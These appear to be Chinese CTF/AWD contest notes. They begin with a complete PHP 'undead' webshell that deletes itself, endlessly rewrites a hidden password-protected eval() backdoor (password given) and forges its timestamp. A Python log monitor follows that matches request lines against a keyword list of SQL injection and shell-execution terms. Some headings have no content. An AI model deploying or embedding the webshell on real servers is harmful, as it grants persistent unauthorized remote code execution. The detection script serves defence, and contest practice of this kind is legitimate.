不死马

普通不死马

<?php
    ignore_user_abort(true);  // 函数设置与客户机断开是否会终止脚本的执行。
    set_time_limit(0);  // 设置脚本最大执行时间,如果设置为0,则没有时间方面的限制
    unlink(__FILE__);  // unlink删除文件 __FILE__取得当前文件的绝对地址 也就是删除自身
    $file = '.shell.php';
    $code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?>';
    //pass=pass
    while (1){
        file_put_contents($file,$code);  // 写入文件
        system('touch -m -d "2018-12-01 09:10:12" .shell.php'); // 修改文件时间
        usleep(5000);  //函数延迟代码执行若干微秒
    }
?>

RSA不死马

参考

使用var_dump()分析预置后门

参考

使用var_dump 分析最后字符串的结果

流量监控脚本

参考

#coding=utf-8
##Author: 7i4n2h3n9 & EDS
##Team: Polar Day Cyberspace Security LAB

import os
import sys
import re
import pyinotify

# Set Log Path
def setHttpserver():
    print('Please set the log path of HTTPserver')
    logDir = input('Please input the path:')
    if os.path.isfile(logDir):
        return logDir
    else:
        print('File does not exist!')
        print('Exit the program......')
        sys.exit

class EventHandler(pyinotify.ProcessEvent):
    def __init__(self, file_path, *args, **kwargs):
        super(EventHandler, self).__init__(*args, **kwargs)
        self.file_path = file_path
        self._last_position = 0
        logpats = r'((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})(\.((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})){3}'
        self._logpat = re.compile(logpats)

    def process_IN_MODIFY(self, event):
        #print("File changed: " + event.pathname)
        if self._last_position > os.path.getsize(self.file_path):
            self._last_position = 0
        with open(self.file_path) as f:
            f.seek(self._last_position)
            loglines = f.readlines()
            self._last_position = f.tell()
            groups = (self._logpat.search(line.strip()) for line in loglines)
            for g in groups:
                if check_Log(g.string):
                    print(g.string)

def check_Log(strLog):
    if re.search('union|eval|alert|update|insert|into|from|create|delete|drop|truncate|rename|desc|charset|ascii|bin|char|uncompress|concat|concat_ws|conv|export_set|hex|instr|left|load_file|locate|sub|substring|oct|reverse|right|unhex|prompt|fwrite|curl|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore|whoami|bash|phpinfo|msgbox|select|ord|mid|group|and|flag',strLog,re.I):
        return True
    else:
        return False

def LogMonitor(path):
    wm = pyinotify.WatchManager()
    mask = pyinotify.IN_MODIFY
    handler = EventHandler(path)
    notifier = pyinotify.Notifier(wm, handler)
    wm.add_watch(handler.file_path, mask)

    print('Now Starting Monitor %s' % (path))
    while True:
        try:
            notifier.loop()
        except KeyboardInterrupt:
            notifier.stop()
            break

if __name__ == '__main__' :
    logDir = setHttpserver()
    LogMonitor(logDir)

一个好奇的人